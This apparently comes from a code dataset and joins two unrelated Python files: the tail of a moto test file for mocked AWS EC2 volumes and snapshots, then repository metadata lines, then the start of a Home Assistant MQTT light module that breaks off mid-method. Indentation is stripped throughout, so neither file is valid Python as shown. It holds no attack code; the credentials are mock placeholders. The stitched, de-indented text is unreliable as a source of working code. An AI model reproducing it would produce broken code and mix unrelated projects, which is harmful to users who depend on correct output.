volumes_by_attach_instance_id = conn.get_all_volumes(filters={'attachment.instance-id': instance.id})
set([vol.id for vol in volumes_by_attach_instance_id]).should.equal(set([block_mapping.volume_id]))
volumes_by_create_time = conn.get_all_volumes(filters={'create-time': volume4.create_time})
set([vol.create_time for vol in volumes_by_create_time]).should.equal(set([volume4.create_time]))
volumes_by_size = conn.get_all_volumes(filters={'size': volume2.size})
set([vol.id for vol in volumes_by_size]).should.equal(set([volume2.id]))
volumes_by_snapshot_id = conn.get_all_volumes(filters={'snapshot-id': snapshot.id})
set([vol.id for vol in volumes_by_snapshot_id]).should.equal(set([volume4.id]))
volumes_by_status = conn.get_all_volumes(filters={'status': 'in-use'})
set([vol.id for vol in volumes_by_status]).should.equal(set([block_mapping.volume_id]))
volumes_by_id = conn.get_all_volumes(filters={'volume-id': volume1.id})
set([vol.id for vol in volumes_by_id]).should.equal(set([volume1.id]))
volumes_by_tag_key = conn.get_all_volumes(filters={'tag-key': 'testkey1'})
set([vol.id for vol in volumes_by_tag_key]).should.equal(set([volume1.id]))
volumes_by_tag_value = conn.get_all_volumes(filters={'tag-value': 'testvalue1'})
set([vol.id for vol in volumes_by_tag_value]).should.equal(set([volume1.id]))
volumes_by_tag = conn.get_all_volumes(filters={'tag:testkey1': 'testvalue1'})
set([vol.id for vol in volumes_by_tag]).should.equal(set([volume1.id]))
@mock_ec2
def test_volume_attach_and_detach():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
volume = conn.create_volume(80, "us-east-1a")
volume.update()
volume.volume_state().should.equal('available')
volume.attach(instance.id, "/dev/sdh")
volume.update()
volume.volume_state().should.equal('in-use')
volume.attach_data.instance_id.should.equal(instance.id)
volume.detach()
volume.update()
volume.volume_state().should.equal('available')
with assert_raises(EC2ResponseError) as cm1:
volume.attach('i-1234abcd', "/dev/sdh")
cm1.exception.code.should.equal('InvalidInstanceID.NotFound')
cm1.exception.status.should.equal(400)
cm1.exception.request_id.should_not.be.none
with assert_raises(EC2ResponseError) as cm2:
conn.detach_volume(volume.id, instance.id, "/dev/sdh")
cm2.exception.code.should.equal('InvalidAttachment.NotFound')
cm2.exception.status.should.equal(400)
cm2.exception.request_id.should_not.be.none
with assert_raises(EC2ResponseError) as cm3:
conn.detach_volume(volume.id, 'i-1234abcd', "/dev/sdh")
cm3.exception.code.should.equal('InvalidInstanceID.NotFound')
cm3.exception.status.should.equal(400)
cm3.exception.request_id.should_not.be.none
@mock_ec2
def test_create_snapshot():
conn = boto.connect_ec2('the_key', 'the_secret')
volume = conn.create_volume(80, "us-east-1a")
snapshot = volume.create_snapshot('a test snapshot')
snapshot.update()
snapshot.status.should.equal('completed')
snapshots = conn.get_all_snapshots()
snapshots.should.have.length_of(1)
snapshots[0].description.should.equal('a test snapshot')
snapshots[0].start_time.should_not.be.none
# Create snapshot without description
snapshot = volume.create_snapshot()
conn.get_all_snapshots().should.have.length_of(2)
snapshot.delete()
conn.get_all_snapshots().should.have.length_of(1)
# Deleting something that was already deleted should throw an error
with assert_raises(EC2ResponseError) as cm:
snapshot.delete()
cm.exception.code.should.equal('InvalidSnapshot.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2
def test_filter_snapshot_by_id():
conn = boto.connect_ec2('the_key', 'the_secret')
volume1 = conn.create_volume(36, "us-east-1a")
snap1 = volume1.create_snapshot('a test snapshot 1')
volume2 = conn.create_volume(42, 'us-east-1a')
snap2 = volume2.create_snapshot('a test snapshot 2')
volume3 = conn.create_volume(84, 'us-east-1a')
snap3 = volume3.create_snapshot('a test snapshot 3')
snapshots1 = conn.get_all_snapshots(snapshot_ids=snap2.id)
snapshots1.should.have.length_of(1)
snapshots1[0].volume_id.should.equal(volume2.id)
snapshots1[0].region.name.should.equal(conn.region.name)
snapshots2 = conn.get_all_snapshots(snapshot_ids=[snap2.id, snap3.id])
snapshots2.should.have.length_of(2)
for s in snapshots2:
s.start_time.should_not.be.none
s.volume_id.should.be.within([volume2.id, volume3.id])
s.region.name.should.equal(conn.region.name)
@mock_ec2
def test_snapshot_filters():
conn = boto.connect_ec2('the_key', 'the_secret')
volume1 = conn.create_volume(20, "us-east-1a")
volume2 = conn.create_volume(25, "us-east-1a")
snapshot1 = volume1.create_snapshot(description='testsnapshot1')
snapshot2 = volume1.create_snapshot(description='testsnapshot2')
snapshot3 = volume2.create_snapshot(description='testsnapshot3')
conn.create_tags([snapshot1.id], {'testkey1': 'testvalue1'})
conn.create_tags([snapshot2.id], {'testkey2': 'testvalue2'})
snapshots_by_description = conn.get_all_snapshots(filters={'description': 'testsnapshot1'})
set([snap.id for snap in snapshots_by_description]).should.equal(set([snapshot1.id]))
snapshots_by_id = conn.get_all_snapshots(filters={'snapshot-id': snapshot1.id})
set([snap.id for snap in snapshots_by_id]).should.equal(set([snapshot1.id]))
snapshots_by_start_time = conn.get_all_snapshots(filters={'start-time': snapshot1.start_time})
set([snap.start_time for snap in snapshots_by_start_time]).should.equal(set([snapshot1.start_time]))
snapshots_by_volume_id = conn.get_all_snapshots(filters={'volume-id': volume1.id})
set([snap.id for snap in snapshots_by_volume_id]).should.equal(set([snapshot1.id, snapshot2.id]))
snapshots_by_volume_size = conn.get_all_snapshots(filters={'volume-size': volume1.size})
set([snap.id for snap in snapshots_by_volume_size]).should.equal(set([snapshot1.id, snapshot2.id]))
snapshots_by_tag_key = conn.get_all_snapshots(filters={'tag-key': 'testkey1'})
set([snap.id for snap in snapshots_by_tag_key]).should.equal(set([snapshot1.id]))
snapshots_by_tag_value = conn.get_all_snapshots(filters={'tag-value': 'testvalue1'})
set([snap.id for snap in snapshots_by_tag_value]).should.equal(set([snapshot1.id]))
snapshots_by_tag = conn.get_all_snapshots(filters={'tag:testkey1': 'testvalue1'})
set([snap.id for snap in snapshots_by_tag]).should.equal(set([snapshot1.id]))
@mock_ec2
def test_snapshot_attribute():
conn = boto.connect_ec2('the_key', 'the_secret')
volume = conn.create_volume(80, "us-east-1a")
snapshot = volume.create_snapshot()
# Baseline
attributes = conn.get_snapshot_attribute(snapshot.id, attribute='createVolumePermission')
attributes.name.should.equal('create_volume_permission')
attributes.attrs.should.have.length_of(0)
ADD_GROUP_ARGS = {'snapshot_id': snapshot.id,
'attribute': 'createVolumePermission',
'operation': 'add',
'groups': 'all'}
REMOVE_GROUP_ARGS = {'snapshot_id': snapshot.id,
'attribute': 'createVolumePermission',
'operation': 'remove',
'groups': 'all'}
# Add 'all' group and confirm
conn.modify_snapshot_attribute(**ADD_GROUP_ARGS)
attributes = conn.get_snapshot_attribute(snapshot.id, attribute='createVolumePermission')
attributes.attrs['groups'].should.have.length_of(1)
attributes.attrs['groups'].should.equal(['all'])
# Add is idempotent
conn.modify_snapshot_attribute.when.called_with(**ADD_GROUP_ARGS).should_not.throw(EC2ResponseError)
# Remove 'all' group and confirm
conn.modify_snapshot_attribute(**REMOVE_GROUP_ARGS)
attributes = conn.get_snapshot_attribute(snapshot.id, attribute='createVolumePermission')
attributes.attrs.should.have.length_of(0)
# Remove is idempotent
conn.modify_snapshot_attribute.when.called_with(**REMOVE_GROUP_ARGS).should_not.throw(EC2ResponseError)
# Error: Add with group != 'all'
with assert_raises(EC2ResponseError) as cm:
conn.modify_snapshot_attribute(snapshot.id,
attribute='createVolumePermission',
operation='add',
groups='everyone')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with invalid snapshot ID
with assert_raises(EC2ResponseError) as cm:
conn.modify_snapshot_attribute("snapshot-abcd1234",
attribute='createVolumePermission',
operation='add',
groups='all')
cm.exception.code.should.equal('InvalidSnapshot.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Remove with invalid snapshot ID
with assert_raises(EC2ResponseError) as cm:
conn.modify_snapshot_attribute("snapshot-abcd1234",
attribute='createVolumePermission',
operation='remove',
groups='all')
cm.exception.code.should.equal('InvalidSnapshot.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add or remove with user ID instead of group
conn.modify_snapshot_attribute.when.called_with(snapshot.id,
attribute='createVolumePermission',
operation='add',
user_ids=['user']).should.throw(NotImplementedError)
conn.modify_snapshot_attribute.when.called_with(snapshot.id,
attribute='createVolumePermission',
operation='remove',
user_ids=['user']).should.throw(NotImplementedError)
@mock_ec2
def test_create_volume_from_snapshot():
conn = boto.connect_ec2('the_key', 'the_secret')
volume = conn.create_volume(80, "us-east-1a")
snapshot = volume.create_snapshot('a test snapshot')
snapshot.update()
snapshot.status.should.equal('completed')
new_volume = snapshot.create_volume('us-east-1a')
new_volume.size.should.equal(80)
new_volume.snapshot_id.should.equal(snapshot.id)
@mock_ec2
def test_modify_attribute_blockDeviceMapping():
"""
Reproduces the missing feature explained at [0], where we want to mock a
call to modify an instance attribute of type: blockDeviceMapping.
[0] https://github.com/spulec/moto/issues/160
"""
conn = boto.ec2.connect_to_region("us-east-1")
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
instance.modify_attribute('blockDeviceMapping', {'/dev/sda1': True})
instance = ec2_backends[conn.region.name].get_instance(instance.id)
instance.block_device_mapping.should.have.key('/dev/sda1')
instance.block_device_mapping['/dev/sda1'].delete_on_termination.should.be(True)
@mock_ec2
def test_volume_tag_escaping():
conn = boto.connect_ec2('the_key', 'the_secret')
vol = conn.create_volume(10, 'us-east-1a')
snapshot = conn.create_snapshot(vol.id, 'Desc')
snapshot.add_tags({'key': '</closed>'})
dict(conn.get_all_snapshots()[0].tags).should.equal({'key': '</closed>'})
|
mrucci/moto
|
tests/test_ec2/test_elastic_block_store.py
|
Python
|
apache-2.0
| 14,810
|
"""Support for MQTT lights."""
import logging
import voluptuous as vol
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_MODE,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_EFFECT_LIST,
ATTR_HS_COLOR,
ATTR_MAX_MIREDS,
ATTR_MIN_MIREDS,
ATTR_RGB_COLOR,
ATTR_RGBW_COLOR,
ATTR_RGBWW_COLOR,
ATTR_SUPPORTED_COLOR_MODES,
ATTR_WHITE,
ATTR_WHITE_VALUE,
ATTR_XY_COLOR,
COLOR_MODE_BRIGHTNESS,
COLOR_MODE_COLOR_TEMP,
COLOR_MODE_HS,
COLOR_MODE_ONOFF,
COLOR_MODE_RGB,
COLOR_MODE_RGBW,
COLOR_MODE_RGBWW,
COLOR_MODE_UNKNOWN,
COLOR_MODE_WHITE,
COLOR_MODE_XY,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_WHITE_VALUE,
LightEntity,
valid_supported_color_modes,
)
from homeassistant.const import (
CONF_NAME,
CONF_OPTIMISTIC,
CONF_PAYLOAD_OFF,
CONF_PAYLOAD_ON,
CONF_VALUE_TEMPLATE,
STATE_ON,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.restore_state import RestoreEntity
import homeassistant.util.color as color_util
from .. import CONF_COMMAND_TOPIC, CONF_QOS, CONF_RETAIN, CONF_STATE_TOPIC, subscription
from ... import mqtt
from ..debug_info import log_messages
from ..mixins import MQTT_ENTITY_COMMON_SCHEMA, MqttEntity
from .schema import MQTT_LIGHT_SCHEMA_SCHEMA
_LOGGER = logging.getLogger(__name__)
CONF_BRIGHTNESS_COMMAND_TOPIC = "brightness_command_topic"
CONF_BRIGHTNESS_SCALE = "brightness_scale"
CONF_BRIGHTNESS_STATE_TOPIC = "brightness_state_topic"
CONF_BRIGHTNESS_VALUE_TEMPLATE = "brightness_value_template"
CONF_COLOR_MODE_STATE_TOPIC = "color_mode_state_topic"
CONF_COLOR_MODE_VALUE_TEMPLATE = "color_mode_value_template"
CONF_COLOR_TEMP_COMMAND_TEMPLATE = "color_temp_command_template"
CONF_COLOR_TEMP_COMMAND_TOPIC = "color_temp_command_topic"
CONF_COLOR_TEMP_STATE_TOPIC = "color_temp_state_topic"
CONF_COLOR_TEMP_VALUE_TEMPLATE = "color_temp_value_template"
CONF_EFFECT_COMMAND_TOPIC = "effect_command_topic"
CONF_EFFECT_LIST = "effect_list"
CONF_EFFECT_STATE_TOPIC = "effect_state_topic"
CONF_EFFECT_VALUE_TEMPLATE = "effect_value_template"
CONF_HS_COMMAND_TOPIC = "hs_command_topic"
CONF_HS_STATE_TOPIC = "hs_state_topic"
CONF_HS_VALUE_TEMPLATE = "hs_value_template"
CONF_MAX_MIREDS = "max_mireds"
CONF_MIN_MIREDS = "min_mireds"
CONF_RGB_COMMAND_TEMPLATE = "rgb_command_template"
CONF_RGB_COMMAND_TOPIC = "rgb_command_topic"
CONF_RGB_STATE_TOPIC = "rgb_state_topic"
CONF_RGB_VALUE_TEMPLATE = "rgb_value_template"
CONF_RGBW_COMMAND_TEMPLATE = "rgbw_command_template"
CONF_RGBW_COMMAND_TOPIC = "rgbw_command_topic"
CONF_RGBW_STATE_TOPIC = "rgbw_state_topic"
CONF_RGBW_VALUE_TEMPLATE = "rgbw_value_template"
CONF_RGBWW_COMMAND_TEMPLATE = "rgbww_command_template"
CONF_RGBWW_COMMAND_TOPIC = "rgbww_command_topic"
CONF_RGBWW_STATE_TOPIC = "rgbww_state_topic"
CONF_RGBWW_VALUE_TEMPLATE = "rgbww_value_template"
CONF_STATE_VALUE_TEMPLATE = "state_value_template"
CONF_XY_COMMAND_TOPIC = "xy_command_topic"
CONF_XY_STATE_TOPIC = "xy_state_topic"
CONF_XY_VALUE_TEMPLATE = "xy_value_template"
CONF_WHITE_COMMAND_TOPIC = "white_command_topic"
CONF_WHITE_SCALE = "white_scale"
CONF_WHITE_VALUE_COMMAND_TOPIC = "white_value_command_topic"
CONF_WHITE_VALUE_SCALE = "white_value_scale"
CONF_WHITE_VALUE_STATE_TOPIC = "white_value_state_topic"
CONF_WHITE_VALUE_TEMPLATE = "white_value_template"
CONF_ON_COMMAND_TYPE = "on_command_type"
MQTT_LIGHT_ATTRIBUTES_BLOCKED = frozenset(
{
ATTR_COLOR_MODE,
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_EFFECT_LIST,
ATTR_HS_COLOR,
ATTR_MAX_MIREDS,
ATTR_MIN_MIREDS,
ATTR_RGB_COLOR,
ATTR_RGBW_COLOR,
ATTR_RGBWW_COLOR,
ATTR_SUPPORTED_COLOR_MODES,
ATTR_WHITE_VALUE,
ATTR_XY_COLOR,
}
)
DEFAULT_BRIGHTNESS_SCALE = 255
DEFAULT_NAME = "MQTT LightEntity"
DEFAULT_OPTIMISTIC = False
DEFAULT_PAYLOAD_OFF = "OFF"
DEFAULT_PAYLOAD_ON = "ON"
DEFAULT_WHITE_VALUE_SCALE = 255
DEFAULT_WHITE_SCALE = 255
DEFAULT_ON_COMMAND_TYPE = "last"
VALUES_ON_COMMAND_TYPE = ["first", "last", "brightness"]
COMMAND_TEMPLATE_KEYS = [
CONF_COLOR_TEMP_COMMAND_TEMPLATE,
CONF_RGB_COMMAND_TEMPLATE,
CONF_RGBW_COMMAND_TEMPLATE,
CONF_RGBWW_COMMAND_TEMPLATE,
]
VALUE_TEMPLATE_KEYS = [
CONF_BRIGHTNESS_VALUE_TEMPLATE,
CONF_COLOR_MODE_VALUE_TEMPLATE,
CONF_COLOR_TEMP_VALUE_TEMPLATE,
CONF_EFFECT_VALUE_TEMPLATE,
CONF_HS_VALUE_TEMPLATE,
CONF_RGB_VALUE_TEMPLATE,
CONF_RGBW_VALUE_TEMPLATE,
CONF_RGBWW_VALUE_TEMPLATE,
CONF_STATE_VALUE_TEMPLATE,
CONF_WHITE_VALUE_TEMPLATE,
CONF_XY_VALUE_TEMPLATE,
]
PLATFORM_SCHEMA_BASIC = vol.All(
# CONF_VALUE_TEMPLATE is deprecated, support will be removed in 2021.10
cv.deprecated(CONF_VALUE_TEMPLATE, CONF_STATE_VALUE_TEMPLATE),
mqtt.MQTT_RW_PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_BRIGHTNESS_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(
CONF_BRIGHTNESS_SCALE, default=DEFAULT_BRIGHTNESS_SCALE
): vol.All(vol.Coerce(int), vol.Range(min=1)),
vol.Optional(CONF_BRIGHTNESS_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_BRIGHTNESS_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_COLOR_MODE_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_TEMP_COMMAND_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_TEMP_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_COLOR_TEMP_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_COLOR_TEMP_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_EFFECT_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_EFFECT_LIST): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_EFFECT_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_EFFECT_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_HS_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_HS_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_HS_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_MAX_MIREDS): cv.positive_int,
vol.Optional(CONF_MIN_MIREDS): cv.positive_int,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_ON_COMMAND_TYPE, default=DEFAULT_ON_COMMAND_TYPE): vol.In(
VALUES_ON_COMMAND_TYPE
),
vol.Optional(CONF_OPTIMISTIC, default=DEFAULT_OPTIMISTIC): cv.boolean,
vol.Optional(CONF_PAYLOAD_OFF, default=DEFAULT_PAYLOAD_OFF): cv.string,
vol.Optional(CONF_PAYLOAD_ON, default=DEFAULT_PAYLOAD_ON): cv.string,
vol.Optional(CONF_RGB_COMMAND_TEMPLATE): cv.template,
vol.Optional(CONF_RGB_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_RGB_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_RGB_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_RGBW_COMMAND_TEMPLATE): cv.template,
vol.Optional(CONF_RGBW_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_RGBW_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_RGBW_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_RGBWW_COMMAND_TEMPLATE): cv.template,
vol.Optional(CONF_RGBWW_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_RGBWW_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_RGBWW_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_STATE_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_WHITE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_WHITE_SCALE, default=DEFAULT_WHITE_SCALE): vol.All(
vol.Coerce(int), vol.Range(min=1)
),
vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_WHITE_VALUE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(
CONF_WHITE_VALUE_SCALE, default=DEFAULT_WHITE_VALUE_SCALE
): vol.All(vol.Coerce(int), vol.Range(min=1)),
vol.Optional(CONF_WHITE_VALUE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_WHITE_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_XY_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_XY_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_XY_VALUE_TEMPLATE): cv.template,
}
)
.extend(MQTT_ENTITY_COMMON_SCHEMA.schema)
.extend(MQTT_LIGHT_SCHEMA_SCHEMA.schema),
)
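# Editorial illustration, not part of the original module: a hypothetical configuration
# (already parsed into a dict) of the kind PLATFORM_SCHEMA_BASIC above is meant to
# validate. All topic strings and the entity name are made-up placeholders.
_EXAMPLE_BASIC_CONFIG = {
    "platform": "mqtt",
    "name": "Kitchen Light",
    "command_topic": "home/kitchen/light/set",
    "state_topic": "home/kitchen/light/state",
    "brightness_command_topic": "home/kitchen/light/brightness/set",
    "brightness_state_topic": "home/kitchen/light/brightness",
    "brightness_scale": 100,
}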
async def async_setup_entity_basic(
hass, config, async_add_entities, config_entry, discovery_data=None
):
"""Set up a MQTT Light."""
async_add_entities([MqttLight(hass, config, config_entry, discovery_data)])
class MqttLight(MqttEntity, LightEntity, RestoreEntity):
"""Representation of a MQTT light."""
_attributes_extra_blocked = MQTT_LIGHT_ATTRIBUTES_BLOCKED
def __init__(self, hass, config, config_entry, discovery_data):
"""Initialize MQTT light."""
self._brightness = None
self._color_mode = None
self._color_temp = None
self._effect = None
self._hs_color = None
self._legacy_mode = False
self._rgb_color = None
self._rgbw_color = None
self._rgbww_color = None
self._state = False
self._supported_color_modes = None
self._white_value = None
self._xy_color = None
self._topic = None
self._payload = None
self._command_templates = None
self._value_templates = None
self._optimistic = False
self._optimistic_brightness = False
self._optimistic_color_mode = False
self._optimistic_color_temp = False
self._optimistic_effect = False
self._optimistic_hs_color = False
self._optimistic_rgb_color = False
self._optimistic_rgbw_color = False
self._optimistic_rgbww_color = False
self._optimistic_white_value = False
self._optimistic_xy_color = False
MqttEntity.__init__(self, hass, config, config_entry, discovery_data)
@staticmethod
def config_schema():
"""Return the config schema."""
return PLATFORM_SCHEMA_BASIC
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
if CONF_STATE_VALUE_TEMPLATE not in config and CONF_VALUE_TEMPLATE in config:
config[CONF_STATE_VALUE_TEMPLATE] = config[CONF_VALUE_TEMPLATE]
topic = {
key: config.get(key)
for key in (
CONF_BRIGHTNESS_COMMAND_TOPIC,
CONF_BRIGHTNESS_STATE_TOPIC,
CONF_COLOR_MODE_STATE_TOPIC,
CONF_COLOR_TEMP_COMMAND_TOPIC,
CONF_COLOR_TEMP_STATE_TOPIC,
CONF_COMMAND_TOPIC,
CONF_EFFECT_COMMAND_TOPIC,
CONF_EFFECT_STATE_TOPIC,
CONF_HS_COMMAND_TOPIC,
CONF_HS_STATE_TOPIC,
CONF_RGB_COMMAND_TOPIC,
CONF_RGB_STATE_TOPIC,
CONF_RGBW_COMMAND_TOPIC,
CONF_RGBW_STATE_TOPIC,
CONF_RGBWW_COMMAND_TOPIC,
CONF_RGBWW_STATE_TOPIC,
CONF_STATE_TOPIC,
CONF_WHITE_COMMAND_TOPIC,
CONF_WHITE_VALUE_COMMAND_TOPIC,
CONF_WHITE_VALUE_STATE_TOPIC,
CONF_XY_COMMAND_TOPIC,
CONF_XY_STATE_TOPIC,
)
}
self._topic = topic
self._payload = {"on": config[CONF_PAYLOAD_ON], "off": config[CONF_PAYLOAD_OFF]}
value_templates = {}
for key in VALUE_TEMPLATE_KEYS:
value_templates[key] = lambda value, _: value
for key in VALUE_TEMPLATE_KEYS & config.keys():
tpl = config[key]
value_templates[key] = tpl.async_render_with_possible_json_value
tpl.hass = self.hass
self._value_templates = value_templates
command_templates = {}
for key in COMMAND_TEMPLATE_KEYS:
command_templates[key] = None
for key in COMMAND_TEMPLATE_KEYS & config.keys():
tpl = config[key]
command_templates[key] = tpl.async_render
tpl.hass = self.hass
self._command_templates = command_templates
optimistic = config[CONF_OPTIMISTIC]
self._optimistic_color_mode = (
optimistic or topic[CONF_COLOR_MODE_STATE_TOPIC] is None
)
self._optimistic = optimistic or topic[CONF_STATE_TOPIC] is None
self._optimistic_rgb_color = optimistic or topic[CONF_RGB_STATE_TOPIC] is None
self._optimistic_rgbw_color = optimistic or topic[CONF_RGBW_STATE_TOPIC] is None
self._optimistic_rgbww_color = (
optimistic or topic[CONF_RGBWW_STATE_TOPIC] is None
)
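        # Brightness is treated optimistically when the light is optimistic overall,
        # when a brightness command topic has no matching state topic, or when there
        # is no brightness command topic and no RGB state topic to infer it from.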
self._optimistic_brightness = (
optimistic
or (
topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None
and topic[CONF_BRIGHTNESS_STATE_TOPIC] is None
)
or (
topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is None
and topic[CONF_RGB_STATE_TOPIC] is None
)
)
self._optimistic_color_temp = (
optimistic or topic[CONF_COLOR_TEMP_STATE_TOPIC] is None
)
self._optimistic_effect = optimistic or topic[CONF_EFFECT_STATE_TOPIC] is None
self._optimistic_hs_color = optimistic or topic[CONF_HS_STATE_TOPIC] is None
self._optimistic_white_value = (
optimistic or topic[CONF_WHITE_VALUE_STATE_TOPIC] is None
)
self._optimistic_xy_color = optimistic or topic[CONF_XY_STATE_TOPIC] is None
supported_color_modes = set()
if topic[CONF_COLOR_TEMP_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_COLOR_TEMP)
self._color_mode = COLOR_MODE_COLOR_TEMP
if topic[CONF_HS_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_HS)
self._color_mode = COLOR_MODE_HS
if topic[CONF_RGB_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_RGB)
self._color_mode = COLOR_MODE_RGB
if topic[CONF_RGBW_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_RGBW)
self._color_mode = COLOR_MODE_RGBW
if topic[CONF_RGBWW_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_RGBWW)
self._color_mode = COLOR_MODE_RGBWW
if topic[CONF_WHITE_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_WHITE)
if topic[CONF_XY_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_XY)
self._color_mode = COLOR_MODE_XY
if len(supported_color_modes) > 1:
self._color_mode = COLOR_MODE_UNKNOWN
if not supported_color_modes:
if topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None:
self._color_mode = COLOR_MODE_BRIGHTNESS
supported_color_modes.add(COLOR_MODE_BRIGHTNESS)
else:
self._color_mode = COLOR_MODE_ONOFF
supported_color_modes.add(COLOR_MODE_ONOFF)
# Validate the color_modes configuration
self._supported_color_modes = valid_supported_color_modes(supported_color_modes)
if topic[CONF_WHITE_VALUE_COMMAND_TOPIC] is not None:
self._legacy_mode = True
def _is_optimistic(self, attribute):
"""Return True if the attribute is optimistically updated."""
return getattr(self, f"_optimistic_{attribute}")
async def _subscribe_topics(self): # noqa: C901
"""(Re)Subscribe to topics."""
topics = {}
last_state = await self.async_get_last_state()
def add_topic(topic, msg_callback):
"""Add a topic."""
if self._topic[topic] is not None:
topics[topic] = {
"topic": self._topic[topic],
"msg_callback": msg_callback,
"qos": self._config[CONF_QOS],
}
def restore_state(attribute, condition_attribute=None):
"""Restore a state attribute."""
if condition_attribute is None:
condition_attribute = attribute
optimistic = self._is_optimistic(condition_attribute)
if optimistic and last_state and last_state.attributes.get(attribute):
setattr(self, f"_{attribute}", last_state.attributes[attribute])
@callback
@log_messages(self.hass, self.entity_id)
def state_received(msg):
"""Handle new MQTT messages."""
payload = self._value_templates[CONF_STATE_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty state message from '%s'", msg.topic)
return
if payload == self._payload["on"]:
self._state = True
elif payload == self._payload["off"]:
self._state = False
self.async_write_ha_state()
if self._topic[CONF_STATE_TOPIC] is not None:
topics[CONF_STATE_TOPIC] = {
"topic": self._topic[CONF_STATE_TOPIC],
"msg_callback": state_received,
"qos": self._config[CONF_QOS],
}
elif self._optimistic and last_state:
self._state = last_state.state == STATE_ON
@callback
@log_messages(self.hass, self.entity_id)
def brightness_received(msg):
"""Handle new MQTT messages for the brightness."""
payload = self._value_templates[CONF_BRIGHTNESS_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty brightness message from '%s'", msg.topic)
return
device_value = float(payload)
percent_bright = device_value / self._config[CONF_BRIGHTNESS_SCALE]
self._brightness = percent_bright * 255
self.async_write_ha_state()
add_topic(CONF_BRIGHTNESS_STATE_TOPIC, brightness_received)
restore_state(ATTR_BRIGHTNESS)
def _rgbx_received(msg, template, color_mode, convert_color):
"""Handle new MQTT messages for RGBW and RGBWW."""
payload = self._value_templates[template](msg.payload, None)
if not payload:
_LOGGER.debug(
"Ignoring empty %s message from '%s'", color_mode, msg.topic
)
return None
color = tuple(int(val) for val in payload.split(","))
if self._optimistic_color_mode:
self._color_mode = color_mode
if self._topic[CONF_BRIGHTNESS_STATE_TOPIC] is None:
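                # No separate brightness state topic: approximate brightness from the
                # value (V) channel of the received color (V is 0..100, scaled to 0..255).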
rgb = convert_color(*color)
percent_bright = float(color_util.color_RGB_to_hsv(*rgb)[2]) / 100.0
self._brightness = percent_bright * 255
return color
@callback
@log_messages(self.hass, self.entity_id)
def rgb_received(msg):
"""Handle new MQTT messages for RGB."""
rgb = _rgbx_received(
msg, CONF_RGB_VALUE_TEMPLATE, COLOR_MODE_RGB, lambda *x: x
)
if not rgb:
return
if self._legacy_mode:
self._hs_color = color_util.color_RGB_to_hs(*rgb)
else:
self._rgb_color = rgb
self.async_write_ha_state()
add_topic(CONF_RGB_STATE_TOPIC, rgb_received)
